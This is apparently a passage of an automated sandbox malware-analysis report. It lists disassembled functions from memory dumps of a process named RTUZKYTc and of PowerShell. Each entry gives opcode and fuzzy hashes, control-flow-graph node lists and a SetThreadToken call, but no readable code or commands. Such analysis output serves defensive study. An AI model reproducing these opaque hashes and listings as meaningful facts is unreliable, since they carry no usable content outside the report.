                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID: LR]q
                                • API String ID: 0-3081347316
                                • Opcode ID: b7202e3e8cbae789bc590619d0a6cc3b83688a2087895dccbe51fb11e98295df
                                • Instruction ID: bd2f86d87d251abb7193de0e4be48ffea8bd667fa75404d6ecfedd437466d610
                                • Opcode Fuzzy Hash: b7202e3e8cbae789bc590619d0a6cc3b83688a2087895dccbe51fb11e98295df
                                • Instruction Fuzzy Hash: B821F830B102158FCB59EB78C55463E7BF6AFC8204B14846DD149DB39AEE34DC02C792
                                Function 02AF0901 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID: Haq
                                • API String ID: 0-725504367
                                • Opcode ID: 0d10292f09b2dcdb60814abda5c0ce8887d1362917fa5d3f2533c0a83e6f3502
                                • Instruction ID: 75c635a0fcc46fddd888497249160adc2088c26385fff29e3db012ff73f679dc
                                • Opcode Fuzzy Hash: 0d10292f09b2dcdb60814abda5c0ce8887d1362917fa5d3f2533c0a83e6f3502
                                • Instruction Fuzzy Hash: C621C630A052089FCB48EFB8D5997AE7FF6AB45300F1044A9D905DB28AEF349D05CB81
                                Function 02AF128F Relevance: .1, Instructions: 98COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 627732dc1eb79de806159ee86ecad3a9a948d648ac17df504e672c6748aacfcf
                                • Instruction ID: 93d21c49ff6c63d69a318b630476f3c233e5b37b2f97dd522714305e56633677
                                • Opcode Fuzzy Hash: 627732dc1eb79de806159ee86ecad3a9a948d648ac17df504e672c6748aacfcf
                                • Instruction Fuzzy Hash: A731893091A3959FCB07EF78E96099D7FB0FF46208B0141EBC449DB2A7E6341A49CB51
                                Function 02AF0CE0 Relevance: .1, Instructions: 79COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a9b028ac4f377f628dbd4d5645ff461604d164a4db249d1551dc2cddd9bab665
                                • Instruction ID: 0df4b7e77aaf14798748cb3afa8e713b155281fa3d355233dd37792fc4269a23
                                • Opcode Fuzzy Hash: a9b028ac4f377f628dbd4d5645ff461604d164a4db249d1551dc2cddd9bab665
                                • Instruction Fuzzy Hash: 7221A471B043055FCB48AFBE585436EBEEEEFC9240B15482DD55AC3396DE384C0687A1
                                Function 02AF0BC9 Relevance: .1, Instructions: 73COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cb0053d81c53433b01b2209d6b984def91fcee1a3f1da094d0cbabd33e584e57
                                • Instruction ID: dd25708a8e3a5e65878bd29e25783d36c4a58cb93c380361307cc4b44e3ac5e0
                                • Opcode Fuzzy Hash: cb0053d81c53433b01b2209d6b984def91fcee1a3f1da094d0cbabd33e584e57
                                • Instruction Fuzzy Hash: 96219C74900209DFCB45FFB8E944BADBBBAFF84300F108969D401E7258EB34AA45CB41
                                Function 02AF0BD8 Relevance: .1, Instructions: 69COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9be872fb1a6ec4da42fbe8d65c8ea8d2004a001cbd3e5d3b564321414039e15f
                                • Instruction ID: 7c1012984c53e6cc838cdb9c99e90537f93f1d1a041436677d052d63b2a27010
                                • Opcode Fuzzy Hash: 9be872fb1a6ec4da42fbe8d65c8ea8d2004a001cbd3e5d3b564321414039e15f
                                • Instruction Fuzzy Hash: 22216974A00209DFCB45FFB8E944AADBBBAFF84304F108969D405E7258EB34AA45CF51
                                Function 02AF0838 Relevance: .0, Instructions: 44COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a6e5f777a39c43651ca24a4a7677a810accde02fd6f91b0d1613365fc62fd58c
                                • Instruction ID: 406ebc75abe56c8e810ed5cdfc0b873e870c80f2db806b440ee4bc18e90a5a14
                                • Opcode Fuzzy Hash: a6e5f777a39c43651ca24a4a7677a810accde02fd6f91b0d1613365fc62fd58c
                                • Instruction Fuzzy Hash: F811B3342452869FCB46FF68F984F553BBEEF45204B149AA49008CB22ED774AD4ACF81
                                Function 02AF1300 Relevance: .0, Instructions: 43COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9300cee4cbf5341370edb38a67e24ad65d44f0f736b587055ebdb3f17cffdbec
                                • Instruction ID: 808a2f583bc958b148a69d55c67ad67854f586f6e9dbbbb182c5d6eed52d00e8
                                • Opcode Fuzzy Hash: 9300cee4cbf5341370edb38a67e24ad65d44f0f736b587055ebdb3f17cffdbec
                                • Instruction Fuzzy Hash: E111FA74E1020AEFCF49FFA8E94499DBBB5FF44208B104669C41AE7266EB716E45CF40
                                Function 02AF0848 Relevance: .0, Instructions: 38COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 44012cc9f43e18742fc0a0f7efd5df57064442502c91c236222872dba5b8b767
                                • Instruction ID: 07948bc95837d46c05446d216c8821075640dccfdac4c0aff7b96562135123b6
                                • Opcode Fuzzy Hash: 44012cc9f43e18742fc0a0f7efd5df57064442502c91c236222872dba5b8b767
                                • Instruction Fuzzy Hash: B701953465024A9FCB46FF28FA84F5977AEFF44305B109A649008CB22DD774AD49CF81

                                Execution Graph

                                Execution Coverage:5.9%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:0%
                                Total number of Nodes:3
                                Total number of Limit Nodes:0
                                execution_graph 22456 8e67860 22457 8e678a3 SetThreadToken 22456->22457 22458 8e678d1 22457->22458

                                Executed Functions

                                Function 04E7B470 Relevance: .3, Instructions: 261COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 620 4e7b470-4e7b4a9 622 4e7b4ae-4e7b7e9 call 4e7acbc 620->622 623 4e7b4ab 620->623 684 4e7b7ee-4e7b7f5 622->684 623->622
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c782253656201b92a1d1eb71737e2ecdb7253c2000f7504ed3b9ca147ffc08ff
                                • Instruction ID: 6dec7f145dd713532f6f4fe551d7f6f124278666ae11a24a599230c00ad4eb29
                                • Opcode Fuzzy Hash: c782253656201b92a1d1eb71737e2ecdb7253c2000f7504ed3b9ca147ffc08ff
                                • Instruction Fuzzy Hash: 4A915174A007155FEB19EFB584115AE7BF2EFC4704B01892DD14AAF344DF38A9068BDA
                                Function 04E7B490 Relevance: .3, Instructions: 252COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 685 4e7b490-4e7b4a9 686 4e7b4ae-4e7b7e9 call 4e7acbc 685->686 687 4e7b4ab 685->687 748 4e7b7ee-4e7b7f5 686->748 687->686
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 74dd59f5d3f267711cb92ccf01cb11a6e500759fa30139ca64929552d0974da2
                                • Instruction ID: ef6a043f457bbcd13cbd9db7324f365ea4f2aca05aeb5a77e1515d5fcb49ec28
                                • Opcode Fuzzy Hash: 74dd59f5d3f267711cb92ccf01cb11a6e500759fa30139ca64929552d0974da2
                                • Instruction Fuzzy Hash: 97914274B007195BEB19EFB584115AE7AE2EFC4704B01C92DD14AAF344DF38A9068BDA
                                Function 07BC2308 Relevance: 10.6, Strings: 8, Instructions: 640COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2204498454.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7bc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$pij$pij$pij$pij$pij$|,j
                                • API String ID: 0-1921836591
                                • Opcode ID: 26d787c73c11830c1033e35370a94299758c146be2ead643a309831dcf14771b
                                • Instruction ID: 5ca7a88e9988e078fc317435b814136d05a1a9fc41f983d76bc082012f4af12c
                                • Opcode Fuzzy Hash: 26d787c73c11830c1033e35370a94299758c146be2ead643a309831dcf14771b
                                • Instruction Fuzzy Hash: 0D2214B1B002069FEB24CB6885416EABBE6FF85211F14C0FEE905DB251DB35DD45CBA2
                                Function 07BC3CE8 Relevance: 5.6, Strings: 4, Instructions: 586COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 198 7bc3ce8-7bc3d0d 199 7bc3f00-7bc3f4a 198->199 200 7bc3d13-7bc3d18 198->200 210 7bc40ce-7bc4112 199->210 211 7bc3f50-7bc3f55 199->211 201 7bc3d1a-7bc3d20 200->201 202 7bc3d30-7bc3d34 200->202 204 7bc3d24-7bc3d2e 201->204 205 7bc3d22 201->205 206 7bc3d3a-7bc3d3c 202->206 207 7bc3eb0-7bc3eba 202->207 204->202 205->202 208 7bc3d4c 206->208 209 7bc3d3e-7bc3d4a 206->209 212 7bc3ebc-7bc3ec5 207->212 213 7bc3ec8-7bc3ece 207->213 214 7bc3d4e-7bc3d50 208->214 209->214 239 7bc4228-7bc4248 210->239 240 7bc4118-7bc411d 210->240 215 7bc3f6d-7bc3f71 211->215 216 7bc3f57-7bc3f5d 211->216 217 7bc3ed4-7bc3ee0 213->217 218 7bc3ed0-7bc3ed2 213->218 214->207 222 7bc3d56-7bc3d75 214->222 220 7bc3f77-7bc3f79 215->220 221 7bc4080-7bc408a 215->221 223 7bc3f5f 216->223 224 7bc3f61-7bc3f6b 216->224 226 7bc3ee2-7bc3efd 217->226 218->226 228 7bc3f89 220->228 229 7bc3f7b-7bc3f87 220->229 230 7bc408c-7bc4094 221->230 231 7bc4097-7bc409d 221->231 254 7bc3d85 222->254 255 7bc3d77-7bc3d83 222->255 223->215 224->215 233 7bc3f8b-7bc3f8d 228->233 229->233 234 7bc409f-7bc40a1 231->234 235 7bc40a3-7bc40af 231->235 233->221 241 7bc3f93-7bc3fb2 233->241 242 7bc40b1-7bc40cb 234->242 235->242 257 7bc426c-7bc4277 239->257 258 7bc424a-7bc425d 239->258 243 7bc411f-7bc4125 240->243 244 7bc4135-7bc4139 240->244 275 7bc3fb4-7bc3fc0 241->275 276 7bc3fc2 241->276 248 7bc4129-7bc4133 243->248 249 7bc4127 243->249 251 7bc413f-7bc4141 244->251 252 7bc41da-7bc41e4 244->252 248->244 249->244 259 7bc4151 251->259 260 7bc4143-7bc414f 251->260 261 7bc41e6-7bc41ee 252->261 262 7bc41f1-7bc41f7 252->262 263 7bc3d87-7bc3d89 254->263 255->263 286 7bc427f-7bc4281 257->286 265 7bc425f-7bc4277 258->265 266 7bc428b-7bc4295 258->266 267 7bc4153-7bc4155 259->267 260->267 269 7bc41fd-7bc4209 262->269 270 7bc41f9-7bc41fb 262->270 263->207 271 7bc3d8f-7bc3d96 263->271 265->286 279 7bc429f-7bc42a5 266->279 280 7bc4297-7bc429c 266->280 267->252 273 7bc415b-7bc415d 267->273 277 7bc420b-7bc4225 269->277 270->277 271->199 278 7bc3d9c-7bc3da1 271->278 284 7bc415f-7bc4165 273->284 285 7bc4177-7bc417e 273->285 287 7bc3fc4-7bc3fc6 275->287 276->287 289 7bc3db9-7bc3dc8 278->289 290 7bc3da3-7bc3da9 278->290 281 7bc42ab-7bc42b7 279->281 282 7bc42a7-7bc42a9 279->282 291 7bc42b9-7bc42d2 281->291 282->291 294 7bc4169-7bc4175 284->294 295 7bc4167 284->295 296 7bc4196-7bc41d7 285->296 297 7bc4180-7bc4186 285->297 292 7bc42d5-7bc42fe 286->292 293 7bc4283-7bc4288 286->293 287->221 298 7bc3fcc-7bc4003 287->298 289->207 309 7bc3dce-7bc3dec 289->309 299 7bc3dad-7bc3db7 290->299 300 7bc3dab 290->300 319 7bc432d-7bc435c 292->319 320 7bc4300-7bc4326 292->320 294->285 295->285 304 7bc4188 297->304 305 7bc418a-7bc4194 297->305 324 7bc401d-7bc4024 298->324 325 7bc4005-7bc400b 298->325 299->289 300->289 304->296 305->296 309->207 327 7bc3df2-7bc3e17 309->327 330 7bc435e-7bc437b 319->330 331 7bc4395-7bc439f 319->331 320->319 332 7bc403c-7bc407d 324->332 333 7bc4026-7bc402c 324->333 328 7bc400d 325->328 329 7bc400f-7bc401b 325->329 327->207 351 7bc3e1d-7bc3e24 327->351 328->324 329->324 345 7bc437d-7bc438f 330->345 346 7bc43e5-7bc43ea 330->346 337 7bc43a8-7bc43ae 331->337 338 7bc43a1-7bc43a5 331->338 335 7bc402e 333->335 336 7bc4030-7bc403a 333->336 335->332 336->332 343 7bc43b4-7bc43c0 337->343 344 7bc43b0-7bc43b2 337->344 348 7bc43c2-7bc43e2 343->348 344->348 345->331 346->345 352 7bc3e6a-7bc3e9d 351->352 353 7bc3e26-7bc3e41 351->353 366 7bc3ea4-7bc3ead 352->366 359 7bc3e5b-7bc3e5f 353->359 360 7bc3e43-7bc3e49 353->360 364 7bc3e66-7bc3e68 359->364 361 7bc3e4d-7bc3e59 360->361 362 7bc3e4b 360->362 361->359 362->359 364->366
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2204498454.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7bc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$4']q$4']q
                                • API String ID: 0-1785108022
                                • Opcode ID: 7a0ca232ef10e8921c32d4b300a532a1d062626704a1bde4cf27c8edab5763ca
                                • Instruction ID: 2ce2ff30c397bae5c9d4332be707acf6b4ba63f9064565e023380399d8cd8ebe
                                • Opcode Fuzzy Hash: 7a0ca232ef10e8921c32d4b300a532a1d062626704a1bde4cf27c8edab5763ca
                                • Instruction Fuzzy Hash: 4E1256F17042428FEB25DB6894217AABFE6DFC1310F14C4AED945DB251DB32CA45CBA2
                                Function 08E67858 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 371 8e67858-8e6789b 372 8e678a3-8e678cf SetThreadToken 371->372 373 8e678d1-8e678d7 372->373 374 8e678d8-8e678f5 372->374 373->374
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2209476678.0000000008E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_8e60000_powershell.jbxd
                                Similarity
                                • API ID: ThreadToken
                                • String ID:
                                • API String ID: 3254676861-0
                                • Opcode ID: 946051ad189179d1c662bc2782405b15bcf58b957c8d72ae005259cbddae027d
                                • Instruction ID: baca5ff13c0c2f2d01e75f56d0d9e86b62e45cafe97baf0119a6ea74fe879422
                                • Opcode Fuzzy Hash: 946051ad189179d1c662bc2782405b15bcf58b957c8d72ae005259cbddae027d
                                • Instruction Fuzzy Hash: 931116B59002498FCB10DF9EC545A9EFFF4EF48324F148459D559A7210C774A984CFA1
                                Function 08E67860 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 377 8e67860-8e678cf SetThreadToken 379 8e678d1-8e678d7 377->379 380 8e678d8-8e678f5 377->380 379->380
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2209476678.0000000008E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_8e60000_powershell.jbxd
                                Similarity
                                • API ID: ThreadToken
                                • String ID:
                                • API String ID: 3254676861-0
                                • Opcode ID: 6c90389f7510958a9068d1f916091669ebd29e952b41048f7e1e846b7b5a5225
                                • Instruction ID: 89c1148ed25b6c5b6c633cf4cb1fb5d1c5dac3947e7fc1d76085d8e359bdbf3c
                                • Opcode Fuzzy Hash: 6c90389f7510958a9068d1f916091669ebd29e952b41048f7e1e846b7b5a5225
                                • Instruction Fuzzy Hash: 1511F5B59002588FCB10DF9AC945B9EFBF8EB48324F148459D519A7250C778A944CFA5
                                Function 04E76FC8 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 383 4e76fc8-4e76fe7 384 4e770ed-4e7712b 383->384 385 4e76fed-4e76ff0 383->385 412 4e76ff2 call 4e77664 385->412 413 4e76ff2 call 4e7767f 385->413 387 4e76ff8-4e7700a 388 4e77016-4e7702b 387->388 389 4e7700c 387->389 395 4e770b6-4e770cf 388->395 396 4e77031-4e77041 388->396 389->388 401 4e770d1 395->401 402 4e770da 395->402 397 4e77043 396->397 398 4e7704d-4e7705b call 4e7bf10 396->398 397->398 404 4e77061-4e77065 398->404 401->402 402->384 405 4e77067-4e77077 404->405 406 4e770a5-4e770b0 404->406 407 4e77093-4e7709d 405->407 408 4e77079-4e77091 405->408 406->395 406->396 407->406 408->406 412->387 413->387
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: (aq
                                • API String ID: 0-600464949
                                • Opcode ID: 6a13f350f02fa86faeb23cf19c8a043ea17a6574302e2814cd664a94142d54f5
                                • Instruction ID: 8c2f5431561446494c8c6f0b9d6ad55424490cc27cf77dfa192d668f9afefd30
                                • Opcode Fuzzy Hash: 6a13f350f02fa86faeb23cf19c8a043ea17a6574302e2814cd664a94142d54f5
                                • Instruction Fuzzy Hash: 86415E34B042058FDB04DFA8C554AAEBBF1EF8D715F145499E802EB395DA35EC01CB61
                                Function 04E7AF98 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 414 4e7af98-4e7af9f 415 4e7afa6-4e7afaa 414->415 416 4e7afa1 call 4e7a984 414->416 417 4e7afac-4e7afb9 415->417 418 4e7afba-4e7b055 415->418 416->415 424 4e7b057-4e7b05d 418->424 425 4e7b05e-4e7b07b 418->425 424->425
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: (&]q
                                • API String ID: 0-1343553580
                                • Opcode ID: 2a71d424101bb5691ea1c3833f6c16ce4a5a3470a99a078a9a5d0714c4265642
                                • Instruction ID: 3ea99ab8120d22be29736b04566f65a89834b7a921c1017c364cb50667c26a26
                                • Opcode Fuzzy Hash: 2a71d424101bb5691ea1c3833f6c16ce4a5a3470a99a078a9a5d0714c4265642
                                • Instruction Fuzzy Hash: 4521B271A042588FCB14DFAED404AAFBFF5EF89320F14846AD508E7340CA75A845CBE5
                                Function 07BC17B8 Relevance: .3, Instructions: 331COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 523 7bc17b8-7bc17da 524 7bc1969-7bc19b5 523->524 525 7bc17e0-7bc17e5 523->525 533 7bc19bb-7bc19c0 524->533 534 7bc1b04-7bc1b34 524->534 526 7bc17fd-7bc1801 525->526 527 7bc17e7-7bc17ed 525->527 531 7bc1914-7bc191e 526->531 532 7bc1807-7bc180b 526->532 529 7bc17ef 527->529 530 7bc17f1-7bc17fb 527->530 529->526 530->526 535 7bc192c-7bc1932 531->535 536 7bc1920-7bc1929 531->536 537 7bc180d-7bc181e 532->537 538 7bc184b 532->538 539 7bc19d8-7bc19dc 533->539 540 7bc19c2-7bc19c8 533->540 560 7bc1b44 534->560 561 7bc1b36-7bc1b42 534->561 543 7bc1938-7bc1944 535->543 544 7bc1934-7bc1936 535->544 537->524 555 7bc1824-7bc1829 537->555 541 7bc184d-7bc184f 538->541 551 7bc1ab4-7bc1abe 539->551 552 7bc19e2-7bc19e4 539->552 546 7bc19cc-7bc19d6 540->546 547 7bc19ca 540->547 541->531 548 7bc1855-7bc1859 541->548 549 7bc1946-7bc1966 543->549 544->549 546->539 547->539 548->531 558 7bc185f-7bc1863 548->558 556 7bc1acc-7bc1ad2 551->556 557 7bc1ac0-7bc1ac9 551->557 553 7bc19f4 552->553 554 7bc19e6-7bc19f2 552->554 563 7bc19f6-7bc19f8 553->563 554->563 564 7bc182b-7bc1831 555->564 565 7bc1841-7bc1849 555->565 567 7bc1ad8-7bc1ae4 556->567 568 7bc1ad4-7bc1ad6 556->568 569 7bc1865-7bc186e 558->569 570 7bc1886 558->570 562 7bc1b46-7bc1b48 560->562 561->562 572 7bc1b7c-7bc1b86 562->572 573 7bc1b4a-7bc1b50 562->573 563->551 574 7bc19fe-7bc1a16 563->574 575 7bc1835-7bc183f 564->575 576 7bc1833 564->576 565->541 578 7bc1ae6-7bc1b01 567->578 568->578 579 7bc1875-7bc1882 569->579 580 7bc1870-7bc1873 569->580 577 7bc1889-7bc1911 570->577 585 7bc1b88-7bc1b8d 572->585 586 7bc1b90-7bc1b96 572->586 581 7bc1b5e-7bc1b79 573->581 582 7bc1b52-7bc1b54 573->582 595 7bc1a18-7bc1a1e 574->595 596 7bc1a30-7bc1a34 574->596 575->565 576->565 587 7bc1884 579->587 580->587 582->581 593 7bc1b9c-7bc1ba8 586->593 594 7bc1b98-7bc1b9a 586->594 587->577 598 7bc1baa-7bc1bc1 593->598 594->598 600 7bc1a20 595->600 601 7bc1a22-7bc1a2e 595->601 606 7bc1a3a-7bc1a41 596->606 600->596 601->596 609 7bc1a48-7bc1aa5 606->609 610 7bc1a43-7bc1a46 606->610 612 7bc1aaa-7bc1ab1 609->612 610->612
                                Memory Dump Source
                                • Source File: 00000011.00000002.2204498454.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7bc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fd444bbf4aaca76240b666ccf7e88e25e6cc564987c2c85248bcc4457ab9bb09
                                • Instruction ID: afe71507d8f9c97f340bb774b279c47e8eb9a2462cfa7cb875af78e470cf309f
                                • Opcode Fuzzy Hash: fd444bbf4aaca76240b666ccf7e88e25e6cc564987c2c85248bcc4457ab9bb09
                                • Instruction Fuzzy Hash: 87B124F170420D9FEB14DA6DD4007AABBE6EF85211F18C0AEE445EB252DB31D945CBA2
                                Function 04E729F0 Relevance: .2, Instructions: 209COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 749 4e729f0-4e72a1e 751 4e72af5-4e72b37 749->751 752 4e72a24-4e72a3a 749->752 756 4e72c51-4e72c61 751->756 757 4e72b3d-4e72b56 751->757 753 4e72a3f-4e72a52 752->753 754 4e72a3c 752->754 753->751 761 4e72a58-4e72a65 753->761 754->753 759 4e72b5b-4e72b69 757->759 760 4e72b58 757->760 759->756 766 4e72b6f-4e72b79 759->766 760->759 763 4e72a67 761->763 764 4e72a6a-4e72a7c 761->764 763->764 764->751 768 4e72a7e-4e72a88 764->768 769 4e72b87-4e72b94 766->769 770 4e72b7b-4e72b7d 766->770 771 4e72a96-4e72aa6 768->771 772 4e72a8a-4e72a8c 768->772 769->756 773 4e72b9a-4e72baa 769->773 770->769 771->751 774 4e72aa8-4e72ab2 771->774 772->771 775 4e72baf-4e72bbd 773->775 776 4e72bac 773->776 777 4e72ab4-4e72ab6 774->777 778 4e72ac0-4e72af4 774->778 775->756 781 4e72bc3-4e72bd3 775->781 776->775 777->778 782 4e72bd5 781->782 783 4e72bd8-4e72be5 781->783 782->783 783->756 786 4e72be7-4e72bf7 783->786 787 4e72bfc-4e72c08 786->787 788 4e72bf9 786->788 787->756 790 4e72c0a-4e72c24 787->790 788->787 791 4e72c26 790->791 792 4e72c29 790->792 791->792 793 4e72c2e-4e72c38 792->793 794 4e72c3d-4e72c50 793->794
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c8f4c0f3c85e97510d54e9e1d1697932698dee91fb68bb71d2a70274f47284ca
                                • Instruction ID: 7f1803e362a941b619f858745cc47b390631c359ba2a22a3a49131657e4fbe13
                                • Opcode Fuzzy Hash: c8f4c0f3c85e97510d54e9e1d1697932698dee91fb68bb71d2a70274f47284ca
                                • Instruction Fuzzy Hash: F9918974A002098FCB15CF59C5C49AEFBB1FF88320B2486A9D955AB365C735FC81CBA0
                                Function 04E7BAC0 Relevance: .2, Instructions: 155COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 931 4e7bac0-4e7bb50 935 4e7bb56-4e7bb61 931->935 936 4e7bb52 931->936 937 4e7bb66-4e7bbc0 call 4e7af98 935->937 938 4e7bb63 935->938 936->935 945 4e7bbc2-4e7bbc7 937->945 946 4e7bc11-4e7bc15 937->946 938->937 945->946 949 4e7bbc9-4e7bbec 945->949 947 4e7bc17-4e7bc21 946->947 948 4e7bc26 946->948 947->948 950 4e7bc2b-4e7bc2d 948->950 953 4e7bbf2-4e7bbfd 949->953 951 4e7bc52-4e7bc55 call 4e7a978 950->951 952 4e7bc2f-4e7bc50 950->952 957 4e7bc5a-4e7bc5e 951->957 952->957 955 4e7bc06-4e7bc0f 953->955 956 4e7bbff-4e7bc05 953->956 955->950 956->955 959 4e7bc97-4e7bcc6 957->959 960 4e7bc60-4e7bc89 957->960 960->959
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 28734bf7a2534337df923d38373ae39ce568cbbf7012d77b84aa40b61b2ec922
                                • Instruction ID: 962852f26aa22d1cf6e22aa888976b066d2864a211b07bb386cf7d8aa4f1730d
                                • Opcode Fuzzy Hash: 28734bf7a2534337df923d38373ae39ce568cbbf7012d77b84aa40b61b2ec922
